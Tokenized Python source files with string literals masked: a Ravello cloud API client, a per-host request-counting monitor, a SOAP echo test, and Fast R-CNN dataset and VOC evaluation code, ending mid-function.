<s> import os <EOL> import sys <EOL> import json <EOL> import time <EOL> import struct <EOL> import socket <EOL> import logging <EOL> import ssl <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> import httplib <EOL> import urlparse <EOL> else : <EOL> from urllib import parse as urlparse <EOL> from http import client as httplib <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def random_luid ( ) : <EOL> rnd = os . urandom ( <NUM_LIT:7> ) + '<STR_LIT:\x00>' <EOL> luid = struct . unpack ( '<STR_LIT>' , rnd ) [ <NUM_LIT:0> ] <EOL> return luid <EOL> def update_luids ( obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , dict ) : <EOL> for key in obj : <EOL> value = obj [ key ] <EOL> if key == '<STR_LIT:id>' : <EOL> obj [ '<STR_LIT:id>' ] = random_luid ( ) <EOL> elif isinstance ( value , dict ) or isinstance ( value , list ) : <EOL> update_luids ( value ) <EOL> elif isinstance ( obj , list ) : <EOL> for elem in obj : <EOL> update_luids ( elem ) <EOL> return obj <EOL> class RavelloError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> if len ( self . args ) == <NUM_LIT:2> : <EOL> return '<STR_LIT>' % ( self . args [ <NUM_LIT:1> ] , self . args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return self . args [ <NUM_LIT:0> ] <EOL> def should_retry ( exc ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( exc , socket . timeout ) : <EOL> return True <EOL> elif isinstance ( exc , ssl . SSLError ) : <EOL> return '<STR_LIT:time>' in exc [ <NUM_LIT:0> ] <EOL> return False <EOL> def idempotent ( method ) : <EOL> return method in ( '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class RavelloClient ( object ) : <EOL> """<STR_LIT>""" <EOL> default_retries = <NUM_LIT:3> <EOL> default_timeout = <NUM_LIT:30> <EOL> default_url = '<STR_LIT>' <EOL> def __init__ ( self , username = None , password = None , service_url = None , <EOL> token = None , retries = None , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> self . logger = logging . getLogger ( '<STR_LIT>' ) <EOL> self . username = username <EOL> self . password = password <EOL> self . _set_url ( service_url ) <EOL> self . token = token <EOL> self . retries = retries or self . default_retries <EOL> self . timeout = timeout or self . default_timeout <EOL> self . connection = None <EOL> self . _cookie = None <EOL> self . _project = None <EOL> self . _total_retries = <NUM_LIT:0> <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = self . __dict__ . copy ( ) <EOL> state [ '<STR_LIT>' ] = None <EOL> if state [ '<STR_LIT>' ] : <EOL> state [ '<STR_LIT>' ] = True <EOL> return state <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . logger = logging . getLogger ( '<STR_LIT>' ) <EOL> if self . connection : <EOL> self . _connect ( ) <EOL> def __repr__ ( self ) : <EOL> res = '<STR_LIT>' . format ( self . __class__ . __name__ , self . url ) <EOL> if self . _cookie : <EOL> res += '<STR_LIT>' <EOL> elif self . connection : <EOL> res += '<STR_LIT>' <EOL> else : <EOL> res += '<STR_LIT>' <EOL> res += '<STR_LIT:>>' <EOL> return res <EOL> def _set_url ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if url is None : <EOL> url = self . default_url <EOL> parsed = urlparse . urlsplit ( url ) <EOL> if parsed . scheme not in ( '<STR_LIT>' , '<STR_LIT:http>' , '<STR_LIT>' ) : <EOL> raise ValueError ( '<STR_LIT>' % self . scheme ) <EOL> self . scheme = parsed . scheme or '<STR_LIT:http>' <EOL> self . host = parsed . netloc <EOL> self . path = parsed . path . rstrip ( '<STR_LIT:/>' ) <EOL> if parsed . port : <EOL> self . port = parsed . port <EOL> elif self . scheme == '<STR_LIT:http>' : <EOL> self . port = httplib . HTTP_PORT <EOL> else : <EOL> self . port = httplib . HTTPS_PORT <EOL> self . url = url <EOL> def _retry_request ( self , method , url , body , headers ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> for i in range ( self . retries ) : <EOL> try : <EOL> if self . connection is None : <EOL> self . _connect ( ) <EOL> self . _login ( ) <EOL> t1 = time . time ( ) <EOL> self . connection . request ( method , url , body , dict ( headers ) ) <EOL> response = self . connection . getresponse ( ) <EOL> response . body = response . read ( ) <EOL> t2 = time . time ( ) <EOL> log . debug ( '<STR_LIT>' . format ( t2 - t1 ) ) <EOL> except Exception as error : <EOL> self . close ( ) <EOL> if not should_retry ( error ) or not idempotent ( method ) : <EOL> raise <EOL> else : <EOL> return response <EOL> self . _total_retries += <NUM_LIT:1> <EOL> log . debug ( '<STR_LIT>' ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> raise RavelloError ( '<STR_LIT>' ) <EOL> def _make_request ( self , method , url , body = None , headers = None ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> url = self . path + url <EOL> if headers is None : <EOL> headers = [ ] <EOL> headers . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> headers . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if self . _cookie is not None : <EOL> headers . append ( ( '<STR_LIT>' , self . _cookie ) ) <EOL> if body is None : <EOL> body = '<STR_LIT>' <EOL> else : <EOL> body = json . dumps ( body ) <EOL> headers . append ( ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ) <EOL> try : <EOL> log . debug ( '<STR_LIT>' , method , url , len ( body ) ) <EOL> response = self . _retry_request ( method , url , body , dict ( headers ) ) <EOL> except ( socket . error , ssl . SSLError , httplib . HTTPException ) as e : <EOL> log . error ( '<STR_LIT>' , str ( e ) ) <EOL> raise RavelloError ( str ( e ) ) <EOL> body = response . body <EOL> ctype = response . getheader ( '<STR_LIT:Content-Type>' ) <EOL> log . debug ( '<STR_LIT>' . format ( response . status , len ( body ) , ctype ) ) <EOL> if <NUM_LIT:200> <= response . status < <NUM_LIT> : <EOL> if ctype == '<STR_LIT:application/json>' : <EOL> try : <EOL> parsed = json . loads ( body ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' ) <EOL> return <EOL> response . entity = parsed <EOL> else : <EOL> response . entity = None <EOL> elif response . status == <NUM_LIT> or ( response . status == <NUM_LIT> and <EOL> ( '<STR_LIT>' in response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) ) or <EOL> ( '<STR_LIT>' in response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) ) or <EOL> ( '<STR_LIT>' in response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) ) ) : <EOL> response . entity = None <EOL> else : <EOL> error = response . getheader ( '<STR_LIT>' ) <EOL> message = response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if error : <EOL> log . debug ( '<STR_LIT>' . format ( error , message ) ) <EOL> if not message : <EOL> message = '<STR_LIT>' . format ( response . status , response . reason ) <EOL> raise RavelloError ( message ) <EOL> return response <EOL> def connect ( self , url = None ) : <EOL> """<STR_LIT>""" <EOL> if self . connection is not None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> self . _set_url ( url ) <EOL> try : <EOL> self . _connect ( ) <EOL> except ( socket . error , ssl . SSLError ) as e : <EOL> raise RavelloError ( '<STR_LIT>' ) <EOL> def _connect ( self ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> if self . scheme == '<STR_LIT:http>' : <EOL> conn_class = httplib . HTTPConnection <EOL> else : <EOL> conn_class = httplib . HTTPSConnection <EOL> connection = conn_class ( self . host , self . port , timeout = self . timeout ) <EOL> log . debug ( '<STR_LIT>' . format ( self . host , self . port ) ) <EOL> connection . connect ( ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . connection = connection <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . connection : <EOL> try : <EOL> self . connection . close ( ) <EOL> except Exception : <EOL> pass <EOL> self . connection = None <EOL> self . _cookie = None <EOL> def login ( self , username = None , password = None , token = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _cookie is not None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if username is not None : <EOL> if password is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if token is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . username = username <EOL> self . password = password <EOL> elif token is not None : <EOL> self . token = token <EOL> self . _login ( ) <EOL> def _login ( self ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> if self . username : <EOL> log . debug ( '<STR_LIT>' ) <EOL> auth = '<STR_LIT>' . format ( self . username , self . password ) <EOL> auth = auth . encode ( '<STR_LIT>' ) <EOL> headers = [ ( '<STR_LIT>' , '<STR_LIT>' % auth ) ] <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , headers = headers ) <EOL> cookies = response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for cookie in cookies . split ( '<STR_LIT:U+002C>' ) : <EOL> parts = [ part . strip ( ) for part in cookie . split ( '<STR_LIT:;>' ) ] <EOL> if parts [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> self . _cookie = parts [ <NUM_LIT:0> ] <EOL> log . debug ( '<STR_LIT>' ) <EOL> break <EOL> else : <EOL> log . error ( '<STR_LIT>' ) <EOL> raise RavelloError ( '<STR_LIT>' ) <EOL> elif self . token : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . _cookie = self . token <EOL> self . hello ( ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if self . _project is None : <EOL> projects = self . get_projects ( ) <EOL> projects = sorted ( projects , key = lambda pr : int ( pr [ '<STR_LIT:id>' ] ) ) <EOL> self . _project = projects [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> def logout ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . connection is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> self . _cookie = None <EOL> def hello ( self ) : <EOL> self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def get_user ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def get_project ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> return response . entity [ '<STR_LIT>' ] <EOL> def get_projects ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> projects = response . entity . get ( '<STR_LIT>' , [ ] ) <EOL> return projects <EOL> def get_pubkey ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> return response . entity <EOL> def get_pubkeys ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def create_pubkey ( self , pubkey ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , pubkey ) <EOL> return response . entity <EOL> def create_keypair ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def get_image ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' % id ) <EOL> if not response . entity : <EOL> return <EOL> return response . entity [ '<STR_LIT:value>' ] <EOL> def get_images ( self ) : <EOL> """<STR_LIT>""" <EOL> images = [ ] <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for image in response . entity . get ( '<STR_LIT>' , [ ] ) : <EOL> images . append ( dict ( image , public = False ) ) <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for image in response . entity . get ( '<STR_LIT>' , [ ] ) : <EOL> images . append ( dict ( image , public = True ) ) <EOL> return images <EOL> def get_application ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> if not response . entity : <EOL> return <EOL> application = response . entity <EOL> application . update ( application . pop ( '<STR_LIT>' ) ) <EOL> return application <EOL> def get_applications ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def create_application ( self , application ) : <EOL> """<STR_LIT>""" <EOL> application = application . copy ( ) <EOL> application [ '<STR_LIT>' ] = { } <EOL> for key in list ( application ) : <EOL> if key not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> application [ '<STR_LIT>' ] [ key ] = application . pop ( key ) <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , application ) <EOL> application = response . entity <EOL> application . update ( application . pop ( '<STR_LIT>' ) ) <EOL> return application <EOL> def publish_application ( self , application , deploy = None ) : <EOL> """<STR_LIT>""" <EOL> request = deploy or { } <EOL> url = '<STR_LIT>' . format ( application [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT:POST>' , url , request ) <EOL> def remove_application ( self , application ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . format ( application [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT>' , url ) <EOL> def start_vm ( self , application , vm ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . format ( application [ '<STR_LIT:id>' ] , vm [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT:POST>' , url ) <EOL> def stop_vm ( self , application , vm ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . format ( application [ '<STR_LIT:id>' ] , vm [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT:POST>' , url ) <EOL> def get_blueprint ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> if not response . entity : <EOL> return <EOL> blueprint = response . entity <EOL> blueprint . update ( blueprint . pop ( '<STR_LIT>' ) ) <EOL> return blueprint <EOL> def get_blueprints ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def create_blueprint ( self , name , application ) : <EOL> """<STR_LIT>""" <EOL> offline = '<STR_LIT:true>' <EOL> for vm in application . get ( '<STR_LIT>' , [ ] ) : <EOL> if vm . get ( '<STR_LIT>' , { } ) . get ( '<STR_LIT:state>' ) != '<STR_LIT>' : <EOL> offline = '<STR_LIT:false>' <EOL> break <EOL> request = { '<STR_LIT>' : name , <EOL> '<STR_LIT>' : application [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : offline } <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , request ) <EOL> blueprint = response . entity <EOL> blueprint . update ( blueprint . pop ( '<STR_LIT>' ) ) <EOL> return blueprint <EOL> def remove_blueprint ( self , blueprint ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . format ( blueprint [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT>' , url ) </s>
<s> import shared <EOL> import socket <EOL> import time <EOL> PROTECT_URL = '<STR_LIT>' <EOL> blah = shared . SecondBucketCounter ( <NUM_LIT> ) <EOL> agg = shared . AggregatorConnector ( ) <EOL> agg . write ( '<STR_LIT>' % PROTECT_URL ) <EOL> def processData ( data ) : <EOL> if data [ '<STR_LIT:type>' ] == "<STR_LIT>" : <EOL> if data [ '<STR_LIT:url>' ] == PROTECT_URL : <EOL> host = data [ '<STR_LIT:host>' ] <EOL> blah . addItem ( host ) <EOL> if blah . checkItem ( host , <NUM_LIT:2> ) : <EOL> agg . write ( "<STR_LIT>" % host ) <EOL> while True : <EOL> for d in agg . json_read ( ) : <EOL> processData ( d ) </s>
<s> from suds . client import Client as SudsClient <EOL> import requests <EOL> url = '<STR_LIT>' <EOL> client = SudsClient ( url = url , cache = None ) <EOL> r = client . service . echo ( str = '<STR_LIT>' , cnt = <NUM_LIT:3> ) <EOL> print r <EOL> r = client . service . answer ( str = '<STR_LIT>' ) <EOL> print r <EOL> url = '<STR_LIT>' <EOL> params = { '<STR_LIT:str>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:3> } <EOL> r = requests . get ( url = url , params = params ) <EOL> print r . text <EOL> url = '<STR_LIT>' <EOL> params = { '<STR_LIT:str>' : '<STR_LIT>' } <EOL> r = requests . get ( url = url , params = params ) <EOL> print r . text </s>
<s> from . import runner </s>
<s> import os <EOL> import os . path as osp <EOL> import PIL <EOL> from utils . cython_bbox import bbox_overlaps <EOL> import numpy as np <EOL> import scipy . sparse <EOL> import datasets <EOL> class imdb ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . _name = name <EOL> self . _num_classes = <NUM_LIT:0> <EOL> self . _classes = [ ] <EOL> self . _image_index = [ ] <EOL> self . _obj_proposer = '<STR_LIT>' <EOL> self . _roidb = None <EOL> self . _roidb_handler = self . default_roidb <EOL> self . config = { } <EOL> @ property <EOL> def name ( self ) : <EOL> return self . _name <EOL> @ property <EOL> def num_classes ( self ) : <EOL> return len ( self . _classes ) <EOL> @ property <EOL> def classes ( self ) : <EOL> return self . _classes <EOL> @ property <EOL> def image_index ( self ) : <EOL> return self . _image_index <EOL> @ property <EOL> def roidb_handler ( self ) : <EOL> return self . _roidb_handler <EOL> @ roidb_handler . setter <EOL> def roidb_handler ( self , val ) : <EOL> self . _roidb_handler = val <EOL> @ property <EOL> def roidb ( self ) : <EOL> if self . _roidb is not None : <EOL> return self . _roidb <EOL> self . _roidb = self . roidb_handler ( ) <EOL> return self . _roidb <EOL> @ property <EOL> def cache_path ( self ) : <EOL> cache_path = osp . abspath ( osp . join ( datasets . ROOT_DIR , '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> if not os . path . exists ( cache_path ) : <EOL> os . makedirs ( cache_path ) <EOL> return cache_path <EOL> @ property <EOL> def num_images ( self ) : <EOL> return len ( self . image_index ) <EOL> def image_path_at ( self , i ) : <EOL> raise NotImplementedError <EOL> def default_roidb ( self ) : <EOL> raise NotImplementedError <EOL> def evaluate_detections ( self , all_boxes , output_dir = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def append_flipped_images ( self ) : <EOL> num_images = self . num_images <EOL> widths = [ PIL . Image . open ( self . image_path_at ( i ) ) . size [ <NUM_LIT:0> ] <EOL> for i in xrange ( num_images ) ] <EOL> for i in xrange ( num_images ) : <EOL> boxes = self . roidb [ i ] [ '<STR_LIT>' ] . copy ( ) <EOL> oldx1 = boxes [ : , <NUM_LIT:0> ] . copy ( ) <EOL> oldx2 = boxes [ : , <NUM_LIT:2> ] . copy ( ) <EOL> boxes [ : , <NUM_LIT:0> ] = widths [ i ] - oldx2 - <NUM_LIT:1> <EOL> boxes [ : , <NUM_LIT:2> ] = widths [ i ] - oldx1 - <NUM_LIT:1> <EOL> assert ( boxes [ : , <NUM_LIT:2> ] >= boxes [ : , <NUM_LIT:0> ] ) . all ( ) <EOL> entry = { '<STR_LIT>' : boxes , <EOL> '<STR_LIT>' : self . roidb [ i ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self . roidb [ i ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : True } <EOL> self . roidb . append ( entry ) <EOL> self . _image_index = self . _image_index * <NUM_LIT:2> <EOL> def evaluate_recall ( self , candidate_boxes , ar_thresh = <NUM_LIT:0.5> ) : <EOL> gt_overlaps = np . zeros ( <NUM_LIT:0> ) <EOL> for i in xrange ( self . num_images ) : <EOL> gt_inds = np . where ( self . roidb [ i ] [ '<STR_LIT>' ] > <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> gt_boxes = self . roidb [ i ] [ '<STR_LIT>' ] [ gt_inds , : ] <EOL> boxes = candidate_boxes [ i ] <EOL> if boxes . shape [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> continue <EOL> overlaps = bbox_overlaps ( boxes . astype ( np . float ) , <EOL> gt_boxes . astype ( np . float ) ) <EOL> _gt_overlaps = np . zeros ( ( gt_boxes . shape [ <NUM_LIT:0> ] ) ) <EOL> for j in xrange ( gt_boxes . shape [ <NUM_LIT:0> ] ) : <EOL> argmax_overlaps = overlaps . argmax ( axis = <NUM_LIT:0> ) <EOL> max_overlaps = overlaps . max ( axis = <NUM_LIT:0> ) <EOL> gt_ind = max_overlaps . argmax ( ) <EOL> gt_ovr = max_overlaps . max ( ) <EOL> assert ( gt_ovr >= <NUM_LIT:0> ) <EOL> box_ind = argmax_overlaps [ gt_ind ] <EOL> _gt_overlaps [ j ] = overlaps [ box_ind , gt_ind ] <EOL> assert ( _gt_overlaps [ j ] == gt_ovr ) <EOL> overlaps [ box_ind , : ] = - <NUM_LIT:1> <EOL> overlaps [ : , gt_ind ] = - <NUM_LIT:1> <EOL> gt_overlaps = np . hstack ( ( gt_overlaps , _gt_overlaps ) ) <EOL> num_pos = gt_overlaps . size <EOL> gt_overlaps = np . sort ( gt_overlaps ) <EOL> step = <NUM_LIT> <EOL> thresholds = np . minimum ( np . arange ( <NUM_LIT:0.5> , <NUM_LIT:1.0> + step , step ) , <NUM_LIT:1.0> ) <EOL> recalls = np . zeros_like ( thresholds ) <EOL> for i , t in enumerate ( thresholds ) : <EOL> recalls [ i ] = ( gt_overlaps >= t ) . sum ( ) / float ( num_pos ) <EOL> ar = <NUM_LIT:2> * np . trapz ( recalls , thresholds ) <EOL> return ar , gt_overlaps , recalls , thresholds <EOL> def create_roidb_from_box_list ( self , box_list , gt_roidb ) : <EOL> assert len ( box_list ) == self . num_images , '<STR_LIT>' <EOL> roidb = [ ] <EOL> for i in xrange ( self . num_images ) : <EOL> boxes = box_list [ i ] <EOL> num_boxes = boxes . shape [ <NUM_LIT:0> ] <EOL> overlaps = np . zeros ( ( num_boxes , self . num_classes ) , dtype = np . float32 ) <EOL> if gt_roidb is not None : <EOL> gt_boxes = gt_roidb [ i ] [ '<STR_LIT>' ] <EOL> gt_classes = gt_roidb [ i ] [ '<STR_LIT>' ] <EOL> gt_overlaps = bbox_overlaps ( boxes . astype ( np . float ) , <EOL> gt_boxes . astype ( np . float ) ) <EOL> argmaxes = gt_overlaps . argmax ( axis = <NUM_LIT:1> ) <EOL> maxes = gt_overlaps . max ( axis = <NUM_LIT:1> ) <EOL> I = np . where ( maxes > <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> overlaps [ I , gt_classes [ argmaxes [ I ] ] ] = maxes [ I ] <EOL> overlaps = scipy . sparse . csr_matrix ( overlaps ) <EOL> roidb . append ( { '<STR_LIT>' : boxes , <EOL> '<STR_LIT>' : np . zeros ( ( num_boxes , ) , <EOL> dtype = np . int32 ) , <EOL> '<STR_LIT>' : overlaps , <EOL> '<STR_LIT>' : False } ) <EOL> return roidb <EOL> @ staticmethod <EOL> def merge_roidbs ( a , b ) : <EOL> assert len ( a ) == len ( b ) <EOL> for i in xrange ( len ( a ) ) : <EOL> a [ i ] [ '<STR_LIT>' ] = np . vstack ( ( a [ i ] [ '<STR_LIT>' ] , b [ i ] [ '<STR_LIT>' ] ) ) <EOL> a [ i ] [ '<STR_LIT>' ] = np . hstack ( ( a [ i ] [ '<STR_LIT>' ] , <EOL> b [ i ] [ '<STR_LIT>' ] ) ) <EOL> a [ i ] [ '<STR_LIT>' ] = scipy . sparse . vstack ( [ a [ i ] [ '<STR_LIT>' ] , <EOL> b [ i ] [ '<STR_LIT>' ] ] ) <EOL> return a <EOL> def competition_mode ( self , on ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> import xml . etree . ElementTree as ET <EOL> import os <EOL> import cPickle <EOL> import numpy as np <EOL> def parse_rec ( filename ) : <EOL> """<STR_LIT>""" <EOL> tree = ET . parse ( filename ) <EOL> objects = [ ] <EOL> for obj in tree . findall ( '<STR_LIT:object>' ) : <EOL> obj_struct = { } <EOL> obj_struct [ '<STR_LIT:name>' ] = obj . find ( '<STR_LIT:name>' ) . text <EOL> obj_struct [ '<STR_LIT>' ] = obj . find ( '<STR_LIT>' ) . text <EOL> obj_struct [ '<STR_LIT>' ] = int ( obj . find ( '<STR_LIT>' ) . text ) <EOL> obj_struct [ '<STR_LIT>' ] = int ( obj . find ( '<STR_LIT>' ) . text ) <EOL> bbox = obj . find ( '<STR_LIT>' ) <EOL> obj_struct [ '<STR_LIT>' ] = [ int ( bbox . find ( '<STR_LIT>' ) . text ) , <EOL> int ( bbox . find ( '<STR_LIT>' ) . text ) , <EOL> int ( bbox . find ( '<STR_LIT>' ) . text ) , <EOL> int ( bbox . find ( '<STR_LIT>' ) . text ) ] <EOL> objects . append ( obj_struct ) <EOL> return objects <EOL> def voc_ap ( rec , prec , use_07_metric = False ) : <EOL> """<STR_LIT>""" <EOL> if use_07_metric : <EOL> ap = <NUM_LIT:0.> <EOL> for t in np . arange ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:0.1> ) : <EOL> if np . sum ( rec >= t ) == <NUM_LIT:0> : <EOL> p = <NUM_LIT:0> <EOL> else : <EOL> p = np . max ( prec [ rec >= t ] ) <EOL> ap = ap + p / <NUM_LIT> <EOL> else : <EOL> mrec = np . concatenate ( ( [ <NUM_LIT:0.> ] , rec , [ <NUM_LIT:1.> ] ) ) <EOL> mpre = np . concatenate ( ( [ <NUM_LIT:0.> ] , prec , [ <NUM_LIT:0.> ] ) ) <EOL> for i in range ( mpre . size - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> mpre [ i - <NUM_LIT:1> ] = np . maximum ( mpre [ i - <NUM_LIT:1> ] , mpre [ i ] ) <EOL> i = np . where ( mrec [ <NUM_LIT:1> : ] != mrec [ : - <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> ap = np . sum ( ( mrec [ i + <NUM_LIT:1> ] - mrec [ i ] ) * mpre [ i + <NUM_LIT:1> ] ) <EOL> return ap <EOL> def voc_eval ( detpath , <EOL> annopath , <EOL> imagesetfile , <EOL> classname , <EOL> cachedir , <EOL> ovthresh = <NUM_LIT:0.5> , <EOL> use_07_metric = False ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isdir ( cachedir ) : <EOL> os . mkdir ( cachedir ) <EOL> cachefile = os . path . join ( cachedir , '<STR_LIT>' ) <EOL> with open ( imagesetfile , '<STR_LIT:r>' ) as f : <EOL> lines = f . readlines ( ) <EOL> imagenames = [ x . strip ( ) for x in lines ] <EOL> if not os . path . isfile ( cachefile ) : <EOL> recs = { } <EOL> for i , imagename in enumerate ( imagenames ) : <EOL> recs [ imagename ] = parse_rec ( annopath . format ( imagename ) ) <EOL> if i % <NUM_LIT:100> == <NUM_LIT:0> : <EOL> print '<STR_LIT>' . format ( <EOL> i + <NUM_LIT:1> , len ( imagenames ) ) <EOL> print '<STR_LIT>' . format ( cachefile ) <EOL> with open ( cachefile , '<STR_LIT:w>' ) as f : <EOL> cPickle . dump ( recs , f ) <EOL> else : <EOL> with open ( cachefile , '<STR_LIT:r>' ) as f : <EOL> recs = cPickle . load ( f ) <EOL> class_recs = { } <EOL> npos = <NUM_LIT:0> <EOL> for imagename in imagenames : <EOL> R = [ obj for obj in recs [ imagename ] if obj [ '<STR_LIT:name>' ] == classname ] <EOL> bbox = np . array ( [ x [ '<STR_LIT>' ] for x in R ] ) <EOL> difficult = np . array ( [ x [ '<STR_LIT>' ] for x in R ] ) . astype ( np . bool ) <EOL> det = [ False ] * len ( R ) <EOL> npos = npos + sum ( ~ difficult ) <EOL> class_recs [ imagename ] = { '<STR_LIT>' : bbox , <EOL> '<STR_LIT>' : difficult , <EOL> '<STR_LIT>' : det } <EOL> detfile = detpath . format ( classname ) <EOL> with open ( detfile , '<STR_LIT:r>' ) as f : <EOL> lines = f . readlines ( ) <EOL> splitlines = [ x . strip ( ) . split ( '<STR_LIT:U+0020>' ) for x in lines ] <EOL> image_ids = [ x [ <NUM_LIT:0> ] for x in splitlines ] <EOL> confidence = np . array ( [ float ( x [ <NUM_LIT:1> ] ) for x in splitlines ] ) <EOL> BB = np . array ( [ [ float ( z ) for z in x [ <NUM_LIT:2> : ] ] for x in splitlines ] ) <EOL> sorted_ind = np . argsort ( - confidence ) <EOL> sorted_scores = np . sort ( - confidence ) <EOL> BB = BB [ sorted_ind , : ] <EOL> image_ids = [ image_ids [ x ] for x in sorted_ind ] <EOL> nd = len ( image_ids ) <EOL> tp = np . zeros ( nd ) <EOL> fp = np . zeros ( nd ) <EOL> for d in range ( nd ) : <EOL> R = class_recs [ image_ids [ d ] ] <EOL> bb = BB [ d , : ] . astype ( float ) <EOL> ovmax = - np . inf <EOL> BBGT = R [ '<STR_LIT>' ] . astype ( float ) <EOL> if BBGT . size > <NUM_LIT:0> : <EOL> ixmin = np . maximum ( BBGT [ : , <NUM_LIT:0> ] , bb [ <NUM_LIT:0> ] ) <EOL> iymin = np . maximum ( BBGT [ : , <NUM_LIT:1> ] , bb [ <NUM_LIT:1> ] ) <EOL> ixmax = np . minimum ( BBGT [ : , <NUM_LIT:2> ] , bb [ <NUM_LIT:2> ] ) <EOL> iymax = np . minimum ( BBGT [ : , <NUM_LIT:3> ] , bb [ 